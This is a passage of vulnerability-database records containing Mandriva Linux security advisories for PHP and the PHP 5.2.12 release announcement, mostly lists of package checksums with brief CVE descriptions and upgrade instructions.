2010.0/x86_64/php-dom-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n f86368b4cd862df230afb47b6df1ae00 2010.0/x86_64/php-eaccelerator-0.9.6-0.358.4.2mdv2010.0.x86_64.rpm\r\n b94cd3ffa30d53a794b25e12c4ffe3b1 2010.0/x86_64/php-eaccelerator-admin-0.9.6-0.358.4.2mdv2010.0.x86_64.rpm\r\n d11edbd96f5e8984bba1e8339ef422f7 2010.0/x86_64/php-enchant-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 06a408cb9f8c4a9569d6efec868c8eb2 2010.0/x86_64/php-exif-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 30549a612bff805c15d22be5697dd3ab 2010.0/x86_64/php-fileinfo-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n afe80d46554c144992302056ede4f28c 2010.0/x86_64/php-filter-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 009673fa236a6885b0cb31d172a68620 2010.0/x86_64/php-ftp-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 0a0a27041055a1b055f5a27209bedb68 2010.0/x86_64/php-gd-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n ed74522fb67a00ee0eac9df8b493be1d 2010.0/x86_64/php-gettext-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n de68c986892957a12b762ec597fe5975 2010.0/x86_64/php-gmp-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 34ce250e5d6fd2bfb35d4acd37639c2d 2010.0/x86_64/php-hash-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 83a528a69b3b055225a0c3bed150f702 2010.0/x86_64/php-iconv-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 8d11ce1e7fa15b18f9fd4d0518aa9673 2010.0/x86_64/php-imap-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 8cf57fb95779336667b79a7e3697bb2f 2010.0/x86_64/php-intl-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 263b05eee6a78e696ba3dfa92cef50b6 2010.0/x86_64/php-json-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 8deebb001ba55d6af19339bc92abf576 2010.0/x86_64/php-ldap-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 2df04edfd1e54f32c62c0ceb3375b1ab 2010.0/x86_64/php-mbstring-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n ed124d26062f605743fe43751adf856d 2010.0/x86_64/php-mcrypt-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 8d68f8ba93263971667c49908289f274 2010.0/x86_64/php-mssql-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 701d98d81dc30b68f04f6a07a4d93ef7 2010.0/x86_64/php-mysql-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n e41b38ff84c70017bbac0f321e8a5dfe 2010.0/x86_64/php-mysqli-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n c2d92924b46631c19a6eabf359701dce 2010.0/x86_64/php-odbc-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 929dcd802035a8bcbcc59aed3e07fa7b 2010.0/x86_64/php-openssl-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 82e690723f064dda45556bb900d5d2e1 2010.0/x86_64/php-pcntl-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 20281f6c6b622a04e4db95bfd596fe0f 2010.0/x86_64/php-pdo-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 515478a8ad2d59619c176f1d49db99f7 2010.0/x86_64/php-pdo_dblib-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 59c7a285e8ff867f6a299fc41c3c6c88 2010.0/x86_64/php-pdo_mysql-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n e405f7b1f383dd682d9d3e83e0b55581 2010.0/x86_64/php-pdo_odbc-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n c8cc52013ae004bae95efec6534b2295 2010.0/x86_64/php-pdo_pgsql-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 3c5c649fba9a045226c1801babba4bb1 2010.0/x86_64/php-pdo_sqlite-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 665598932c2a6289bb69e87a13829562 2010.0/x86_64/php-pgsql-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 45f6212a1cc997d09439c54f2fb5421a 2010.0/x86_64/php-posix-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 3330706bb8b4796f04300771049ec978 2010.0/x86_64/php-pspell-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n cc393effb6953959dd0d56b98c2a9689 2010.0/x86_64/php-readline-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 0ca164675f3dce8b3bbc3a04c96cbcd5 2010.0/x86_64/php-recode-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 327c05423ac298c4f7a21b0ec7b5e952 2010.0/x86_64/php-session-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 4db6fb4509bc6330494ab2b9aa0fefd2 2010.0/x86_64/php-shmop-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n d035ea04132d7f0f2baa4c9ab47f4c01 2010.0/x86_64/php-snmp-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n df35b761c968dff54bf28d498a803c3b 2010.0/x86_64/php-soap-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 3426af3c4981a9263769be82924b2ee1 2010.0/x86_64/php-sockets-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n e399f5c4c6835a37443ca8aceb3440e9 2010.0/x86_64/php-sqlite3-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n eedb75005ef614970bd8e7d695439923 2010.0/x86_64/php-suhosin-0.9.29-2.2mdv2010.0.x86_64.rpm\r\n c00cd1045da69b8643f895731b03da44 2010.0/x86_64/php-sybase_ct-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 4f2ca5b417a159ce50f0a35433a25f75 2010.0/x86_64/php-sysvmsg-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 9caf6a8c009101816511e2e3f0e5b9eb 2010.0/x86_64/php-sysvsem-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n f69f49f052a3bd75e4ab4d745cd2aa9a 2010.0/x86_64/php-sysvshm-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n c9cad62df6b345a3907de1588e33da5d 2010.0/x86_64/php-tidy-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 0dc8d1ec81f0d6dccc9e289ca36d1d3a 2010.0/x86_64/php-tokenizer-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 008f86960b6a1089b0412cb21894c81a 2010.0/x86_64/php-wddx-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 11930be12823f993c95cc17fdf5e25ec 2010.0/x86_64/php-xml-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 9b19697ff48883eb8fa1c7700cc85611 2010.0/x86_64/php-xmlreader-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 290dfa94f56b47c4d498e20135a2c4d3 2010.0/x86_64/php-xmlrpc-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 78ac457660ffd4f2d80db2b69cb4ec09 2010.0/x86_64/php-xmlwriter-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 56b5529784960b6bbf1e2b49475161aa 2010.0/x86_64/php-xsl-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n 88e4e45b58fd2fe7a2757ddeb01e0f2a 2010.0/x86_64/php-zip-5.3.1-0.1mdv2010.0.x86_64.rpm\r\n d25dccd760295679cf8787b5107c3246 2010.0/x86_64/php-zlib-5.3.1-0.1mdv2010.0.x86_64.rpm \r\n a202eb53819509b7395cb0b4ba4ae6cf 2010.0/SRPMS/apache-mod_php-5.3.1-0.1mdv2010.0.src.rpm\r\n 52e2ab547cf80d5feec71ea867c7e8dd 2010.0/SRPMS/php-5.3.1-0.1mdv2010.0.src.rpm\r\n dd09b21ab4d24b9e3b0a64e7da5d8a7a 2010.0/SRPMS/php-apc-3.1.3p1-2.2mdv2010.0.src.rpm\r\n 69578a9daaa312128cbec0dcba61d923 2010.0/SRPMS/php-eaccelerator-0.9.6-0.358.4.2mdv2010.0.src.rpm\r\n 6711727b246c38a02d8404e0d9e151f6 2010.0/SRPMS/php-suhosin-0.9.29-2.2mdv2010.0.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFLB+YrmqjQ0CJFipgRArVWAJ9Ny8ZN4QnvNPoQzQLpOVkuwl0/vgCg0ol8\r\nXHw/IdAmerft9IcV0iMm2o0=\r\n=aptB\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2009-11-24T00:00:00", "published": "2009-11-24T00:00:00", "id": "SECURITYVULNS:DOC:22822", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22822", "title": "[ MDVSA-2009:302 ] php", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-3558", "CVE-2009-4142", "CVE-2009-4017", "CVE-2009-4143", "CVE-2009-3557"], "description": "\r\nPHP 5.2.12 Release Announcement\r\n\r\nThe PHP development team would like to announce the immediate availability of PHP 5.2.12. This release focuses on improving the stability of the PHP 5.2.x branch with over 60 bug fixes, some of which are security related. All users of PHP 5.2 are encouraged to upgrade to this release.\r\n\r\nSecurity Enhancements and Fixes in PHP 5.2.12:\r\n\r\n * Fixed a safe_mode bypass in tempnam&#40;&#41; identified by Grzegorz Stachowiak. &#40;CVE-2009-3557, Rasmus&#41;\r\n * Fixed a open_basedir bypass in posix_mkfifo&#40;&#41; identified by Grzegorz Stachowiak. &#40;CVE-2009-3558, Rasmus&#41;\r\n * Added &quot;max_file_uploads&quot; INI directive, which can be set to limit the number of file uploads per-request to 20 by default, to prevent possible DOS via temporary file exhaustion, identified by Bogdan Calin. &#40;CVE-2009-4017, Ilia&#41;\r\n * Added protection for $_SESSION from interrupt corruption and improved &quot;session.save_path&quot; check, identified by Stefan Esser. &#40;CVE-2009-4143, Stas&#41;\r\n * Fixed bug #49785 &#40;insufficient input string validation of htmlspecialchars&#40;&#41;&#41;. &#40;CVE-2009-4142, Moriyoshi, hello at iwamot dot com&#41;\r\n\r\nKey enhancements in PHP 5.2.12 include:\r\n\r\n * Fixed unnecessary invocation of setitimer when timeouts have been disabled. &#40;Arvind Srinivasan&#41;\r\n * Fixed crash in com_print_typeinfo when an invalid typelib is given. &#40;Pierre&#41;\r\n * Fixed crash in SQLiteDatabase::ArrayQuery&#40;&#41; and SQLiteDatabase::SingleQuery&#40;&#41; when calling using Reflection. &#40;Felipe&#41;\r\n * Fixed crash when instantiating PDORow and PDOStatement through Reflection. &#40;Felipe&#41;\r\n * Fixed memory leak in openssl_pkcs12_export_to_file&#40;&#41;. &#40;Felipe&#41;\r\n * Fixed bug #50207 &#40;segmentation fault when concatenating very large strings on 64bit linux&#41;. &#40;Ilia&#41;\r\n * Fixed bug #50162 &#40;Memory leak when fetching timestamp column from Oracle database&#41;. &#40;Felipe&#41;\r\n * Fixed bug #50006 &#40;Segfault caused by uksort&#40;&#41;&#41;. &#40;Felipe&#41;\r\n * Fixed bug #50005 &#40;Throwing through Reflection modified Exception object makes segmentation fault&#41;. &#40;Felipe&#41;\r\n * Fixed bug #49174 &#40;crash when extending PDOStatement and trying to set queryString property&#41;. &#40;Felipe&#41;\r\n * Fixed bug #49098 &#40;mysqli segfault on error&#41;. &#40;Rasmus&#41;\r\n * Over 50 other bug fixes.\r\n\r\nFor users upgrading from PHP 5.0 and PHP 5.1, an upgrade guide is available here, detailing the changes between those releases and PHP 5.2.12.\r\n\r\nFor a full list of changes in PHP 5.2.12, see the ChangeLog.\r\n \r\n", "edition": 1, "modified": "2010-01-08T00:00:00", "published": "2010-01-08T00:00:00", "id": "SECURITYVULNS:DOC:23018", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23018", "title": " PHP 5.2.12 Release Announcement", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "cvelist": ["CVE-2009-3292", "CVE-2009-3291", "CVE-2009-3293"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2009:248\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : php\r\n Date : September 25, 2009\r\n Affected: 2009.1\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities was discovered and corrected in php:\r\n \r\n The php_openssl_apply_verification_policy function in PHP before\r\n 5.2.11 does not properly perform certificate validation, which has\r\n unknown impact and attack vectors, probably related to an ability to\r\n spoof certificates &#40;CVE-2009-3291&#41;.\r\n \r\n Unspecified vulnerability in PHP before 5.2.11 has unknown impact\r\n and attack vectors related to missing sanity checks around exif\r\n processing. &#40;CVE-2009-3292&#41;\r\n \r\n Unspecified vulnerability in the imagecolortransparent function in\r\n PHP before 5.2.11 has unknown impact and attack vectors related to an\r\n incorrect sanity check for the color index. &#40;CVE-2009-3293&#41;. However\r\n in Mandriva we don&#39;t use the bundled libgd source in php per default,\r\n there is a unsupported package in contrib named php-gd-bundled that\r\n eventually will get updated to pickup these fixes.\r\n \r\n This update provides a solution to these vulnerabilities.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3291\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3292\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3293\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2009.1:\r\n 85e87867b1548801a6c2db93fc18fb9d 2009.1/i586/libphp5_common5-5.2.9-6.2mdv2009.1.i586.rpm\r\n 522dceebef8202cddd695f9962db1f18 2009.1/i586/php-bcmath-5.2.9-6.2mdv2009.1.i586.rpm\r\n e4f245c0c1f296a7c3adac8daf7125d8 2009.1/i586/php-bz2-5.2.9-6.2mdv2009.1.i586.rpm\r\n 530e87e21a18e61a70d174213e51e3f1 2009.1/i586/php-calendar-5.2.9-6.2mdv2009.1.i586.rpm\r\n d8075e6ce477d0c2c980696870b7d32c 2009.1/i586/php-cgi-5.2.9-6.2mdv2009.1.i586.rpm\r\n 17bdfb65700ac9515e89104afe26fc7c 2009.1/i586/php-cli-5.2.9-6.2mdv2009.1.i586.rpm\r\n 03719088b010f503a60a9b60d55d268d 2009.1/i586/php-ctype-5.2.9-6.2mdv2009.1.i586.rpm\r\n 4d16e8a053e2c619e9b66ca8ad00394c 2009.1/i586/php-curl-5.2.9-6.2mdv2009.1.i586.rpm\r\n a229d229ec0c305532a9d522727ca817 2009.1/i586/php-dba-5.2.9-6.2mdv2009.1.i586.rpm\r\n d3c14dbf23f93d6f3f348f116a26acb1 2009.1/i586/php-dbase-5.2.9-6.2mdv2009.1.i586.rpm\r\n b449e0fbe5dca4baa1bffac5bcc85e07 2009.1/i586/php-devel-5.2.9-6.2mdv2009.1.i586.rpm\r\n 1dac1b2cc84dfbf9993f2aa26939ffb4 2009.1/i586/php-dom-5.2.9-6.2mdv2009.1.i586.rpm\r\n 1ef14250dc32846e0395a07f4829d52c 2009.1/i586/php-exif-5.2.9-6.2mdv2009.1.i586.rpm\r\n d066223f07fdf6af0722848d82364348 2009.1/i586/php-fcgi-5.2.9-6.2mdv2009.1.i586.rpm\r\n aa3d6954c1e78d2653a52ecf16e471ff 2009.1/i586/php-filter-5.2.9-6.2mdv2009.1.i586.rpm\r\n 35d3f28617e885a4e750bcd3a97ecba0 2009.1/i586/php-ftp-5.2.9-6.2mdv2009.1.i586.rpm\r\n 9174368e959c14b7a5addd08d4874017 2009.1/i586/php-gd-5.2.9-6.2mdv2009.1.i586.rpm\r\n 1af200e3d52ea023318a5495d541b1e4 2009.1/i586/php-gettext-5.2.9-6.2mdv2009.1.i586.rpm\r\n 8c491c96a8ece15d5d60aa5aa2ceab0c 2009.1/i586/php-gmp-5.2.9-6.2mdv2009.1.i586.rpm\r\n ae5c5fcc780bdd07d88cfcd349d30e58 2009.1/i586/php-hash-5.2.9-6.2mdv2009.1.i586.rpm\r\n 2a517cb53a676165d3a4de358c0f148e 2009.1/i586/php-iconv-5.2.9-6.2mdv2009.1.i586.rpm\r\n 1a4c3ab931cd2df5a347170f36c338f7 2009.1/i586/php-imap-5.2.9-6.2mdv2009.1.i586.rpm\r\n 37aba4274ae00ded7e087bbb8605f221 2009.1/i586/php-json-5.2.9-6.2mdv2009.1.i586.rpm\r\n c10f22cb6dcb0e5016c0535738132065 2009.1/i586/php-ldap-5.2.9-6.2mdv2009.1.i586.rpm\r\n 5ef7cd867bfd5b2c329a3e4723f84247 2009.1/i586/php-mbstring-5.2.9-6.2mdv2009.1.i586.rpm\r\n 3de9ad85e6bad9da2f028bb408e33da7 2009.1/i586/php-mcrypt-5.2.9-6.2mdv2009.1.i586.rpm\r\n 0fc60371b161403a58c02e4f964d4b83 2009.1/i586/php-mhash-5.2.9-6.2mdv2009.1.i586.rpm\r\n 5294173b4191fb03944840c8679967b0 2009.1/i586/php-mime_magic-5.2.9-6.2mdv2009.1.i586.rpm\r\n 9df85b613e24cbd38b74978e4e28301c 2009.1/i586/php-ming-5.2.9-6.2mdv2009.1.i586.rpm\r\n f2113d23146f1a295579fe6fc012aa1f 2009.1/i586/php-mssql-5.2.9-6.2mdv2009.1.i586.rpm\r\n 3d8b142f6a4b5290623ef5b28395cd36 2009.1/i586/php-mysql-5.2.9-6.2mdv2009.1.i586.rpm\r\n 12e09193a2be5a3dfc960e9def73278f 2009.1/i586/php-mysqli-5.2.9-6.2mdv2009.1.i586.rpm\r\n 1551a51c721087d3b92260d9f585274b 2009.1/i586/php-ncurses-5.2.9-6.2mdv2009.1.i586.rpm\r\n 916f591a0a987ff98c92cde1cc961e5b 2009.1/i586/php-odbc-5.2.9-6.2mdv2009.1.i586.rpm\r\n 7cf7be81f66e25ac0695644785808bfc 2009.1/i586/php-openssl-5.2.9-6.2mdv2009.1.i586.rpm\r\n f3ba03b40095cc1d08f1a1c725208e80 2009.1/i586/php-pcntl-5.2.9-6.2mdv2009.1.i586.rpm\r\n 9814280eb36dc952fa84195dee51fcb9 2009.1/i586/php-pdo-5.2.9-6.2mdv2009.1.i586.rpm\r\n 6eca042187056998cce3218d29b6fe64 2009.1/i586/php-pdo_dblib-5.2.9-6.2mdv2009.1.i586.rpm\r\n 1db4d26269a9a625e8dd7fce3fb6fac3 2009.1/i586/php-pdo_mysql-5.2.9-6.2mdv2009.1.i586.rpm\r\n 8fb1ec5235174c0f4f2aed4a059820d0 2009.1/i586/php-pdo_odbc-5.2.9-6.2mdv2009.1.i586.rpm\r\n 48cbbd29283af0a26ef08f0a8c43764f 2009.1/i586/php-pdo_pgsql-5.2.9-6.2mdv2009.1.i586.rpm\r\n 52057a39b6523cbdc8c345d55708a726 2009.1/i586/php-pdo_sqlite-5.2.9-6.2mdv2009.1.i586.rpm\r\n 182deb058e30c6231b5e1b6e9c716773 2009.1/i586/php-pgsql-5.2.9-6.2mdv2009.1.i586.rpm\r\n 77a01e22aabdcac128d332a49cdf22c2 2009.1/i586/php-posix-5.2.9-6.2mdv2009.1.i586.rpm\r\n 43a6792914cedc5784a8d632c85906c2 2009.1/i586/php-pspell-5.2.9-6.2mdv2009.1.i586.rpm\r\n b45752be458fcdc318624aa8ec5b7282 2009.1/i586/php-readline-5.2.9-6.2mdv2009.1.i586.rpm\r\n 69765de70de2a84fe5924e68d176c083 2009.1/i586/php-recode-5.2.9-6.2mdv2009.1.i586.rpm\r\n b1e80b8432ac9e51c80cdddbb26cd21a 2009.1/i586/php-session-5.2.9-6.2mdv2009.1.i586.rpm\r\n 8562d7ac3ef9ecafbcbedfc5aeb4d4d0 2009.1/i586/php-shmop-5.2.9-6.2mdv2009.1.i586.rpm\r\n e1613016a170a96713fcf6da6682477a 2009.1/i586/php-snmp-5.2.9-6.2mdv2009.1.i586.rpm\r\n 2e0a5ce706ab444411fc63bfd3e9c8e6 2009.1/i586/php-soap-5.2.9-6.2mdv2009.1.i586.rpm\r\n d625751f8c8e4abdf1d362142d76c787 2009.1/i586/php-sockets-5.2.9-6.2mdv2009.1.i586.rpm\r\n 36dbb23dee2862046ce74ad84b8dd0fe 2009.1/i586/php-sqlite-5.2.9-6.2mdv2009.1.i586.rpm\r\n 0a50e296bbcb03f1eae5e1842b719fcc 2009.1/i586/php-sybase-5.2.9-6.2mdv2009.1.i586.rpm\r\n de1659a6aff4c99b63dc8c1164d2fe61 2009.1/i586/php-sysvmsg-5.2.9-6.2mdv2009.1.i586.rpm\r\n 2189b13becc4418b0c298ee139b4f8f2 2009.1/i586/php-sysvsem-5.2.9-6.2mdv2009.1.i586.rpm\r\n eeeb083fd84b49c50fb6bfb402332dc1 2009.1/i586/php-sysvshm-5.2.9-6.2mdv2009.1.i586.rpm\r\n 99a1a6307e2e25ebd77932496a76efe8 2009.1/i586/php-tidy-5.2.9-6.2mdv2009.1.i586.rpm\r\n 5eb2422032a81fd035ed0a835e264fa2 2009.1/i586/php-tokenizer-5.2.9-6.2mdv2009.1.i586.rpm\r\n 0a372bc1e6df667a9d26c6218ad0a8c6 2009.1/i586/php-wddx-5.2.9-6.2mdv2009.1.i586.rpm\r\n a0b1cd31b14ab59fd5be536a7e5701c9 2009.1/i586/php-xml-5.2.9-6.2mdv2009.1.i586.rpm\r\n 5046cfd407bfd096fa615ab44f8415a1 2009.1/i586/php-xmlreader-5.2.9-6.2mdv2009.1.i586.rpm\r\n 0b8fd99b5c6de57491d43e9e691b6dcb 2009.1/i586/php-xmlrpc-5.2.9-6.2mdv2009.1.i586.rpm\r\n 58bd68197b5d38eca13d24cad5a50e36 2009.1/i586/php-xmlwriter-5.2.9-6.2mdv2009.1.i586.rpm\r\n c062198e507c9b17a27eed035ffe1eb5 2009.1/i586/php-xsl-5.2.9-6.2mdv2009.1.i586.rpm\r\n 4d5c7dc89e290ed2366d5bfd33584c56 2009.1/i586/php-zip-5.2.9-6.2mdv2009.1.i586.rpm\r\n c7c66b802cc467f02b1b88bdc18b5aa5 2009.1/i586/php-zlib-5.2.9-6.2mdv2009.1.i586.rpm \r\n 14ce077421185006aca3c756375f008b 2009.1/SRPMS/php-5.2.9-6.2mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2009.1/X86_64:\r\n 87161d3c159b4ef92ff2496ccac2df7a 2009.1/x86_64/lib64php5_common5-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 2cdc374b15af8866d1570ac45adc2d19 2009.1/x86_64/php-bcmath-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n aa3e358a57c536a98e08862d310b130d 2009.1/x86_64/php-bz2-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 089b7350d826be1e602c212997ca43aa 2009.1/x86_64/php-calendar-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n e05cfd39d2acaf7b0c747205afdbafd8 2009.1/x86_64/php-cgi-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n e52616165bae90bc50434645ae889ba2 2009.1/x86_64/php-cli-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 02f92d9ccbeed27c68f999a08ae1bb74 2009.1/x86_64/php-ctype-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 4a4f312fa9c8b47c85346fe43ee280fe 2009.1/x86_64/php-curl-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n d50ecf0df916ba2b005ed9aef6b7ee00 2009.1/x86_64/php-dba-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 8bb5fecba66fa1f45818841c2e3119c7 2009.1/x86_64/php-dbase-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 29e26f8dd9992765b9ab115695d53487 2009.1/x86_64/php-devel-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 2fbbef91b647b73ecb28a16e0b20c488 2009.1/x86_64/php-dom-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 963db6b3a197618b2909ff47c03ec93e 2009.1/x86_64/php-exif-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 46c2a26f74d9a0b05f31f435d2e52d12 2009.1/x86_64/php-fcgi-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n b7cd04b9c3cda09a22fce1bac23269b3 2009.1/x86_64/php-filter-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 080bffb0d573549dfedd92580ff9d52d 2009.1/x86_64/php-ftp-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 0911154fa6039a0afe2a9ed97641171c 2009.1/x86_64/php-gd-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n dd674b3c6e2a947efd3b7141950461a5 2009.1/x86_64/php-gettext-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n ed7f7469ea0a25d7ccf3c8cfb1f9e636 2009.1/x86_64/php-gmp-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 286eaef3b1cc89b4731d56d59ab981a7 2009.1/x86_64/php-hash-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 3b872a3a221f411ade41c99cb7d51fb8 2009.1/x86_64/php-iconv-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 0b256ee66d4cbe6c2b4c73c2595edc43 2009.1/x86_64/php-imap-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 32650ba3e635036500b581778352f584 2009.1/x86_64/php-json-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 147f7913e5aafa98babee853a95ac8de 2009.1/x86_64/php-ldap-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n a6ba9f430e1d6d99e082aefed08711da 2009.1/x86_64/php-mbstring-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 8b2b749896ab0468242362ab350a5865 2009.1/x86_64/php-mcrypt-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 01ce4ab0320c725e2081f2d79e5969a1 2009.1/x86_64/php-mhash-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 310b3bc146d06143f0f7d92d7816459d 2009.1/x86_64/php-mime_magic-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n a860f058befbed412bc8e1112c22eefd 2009.1/x86_64/php-ming-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 56e0cae3517d53962295eecbaab3119e 2009.1/x86_64/php-mssql-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 65be7a2aa882dbe0a416319c3fe6b1af 2009.1/x86_64/php-mysql-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 5f50ead57339280cfc8115483d1b9cb7 2009.1/x86_64/php-mysqli-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 2960093a83589892d2fce5dfb3d3498b 2009.1/x86_64/php-ncurses-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 2c933d73b441c02a43739f475cee4ea7 2009.1/x86_64/php-odbc-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 0eac641892d2cfbf871ea8aa1f2fd2e8 2009.1/x86_64/php-openssl-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 701c71a52ff7d776e42f8d1bdea592cd 2009.1/x86_64/php-pcntl-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 632035edb60e13778978ac51bb69c849 2009.1/x86_64/php-pdo-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n be87405c1568f2b3c6c53eea74c422e6 2009.1/x86_64/php-pdo_dblib-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 3daf4fd63832ccfbe876c998ab321d3b 2009.1/x86_64/php-pdo_mysql-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 54b7a7bec908451404f229103a9a5127 2009.1/x86_64/php-pdo_odbc-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 25ccde4246c6204dfaa769d54eff97a7 2009.1/x86_64/php-pdo_pgsql-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 44359c40034cc2f19faff6ae6ae9e121 2009.1/x86_64/php-pdo_sqlite-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n ed77502e3b459fa4ca802a3cdb30f308 2009.1/x86_64/php-pgsql-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 9fc636d9e9586bc7c21998fad4aee576 2009.1/x86_64/php-posix-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n 7dbcddb6aed8923bd042e1335716e311 2009.1/x86_64/php-pspell-5.2.9-6.2mdv2009.1.x86_64.rpm\r\n f5fcaac786dfd831d59ea8ad6fc28038 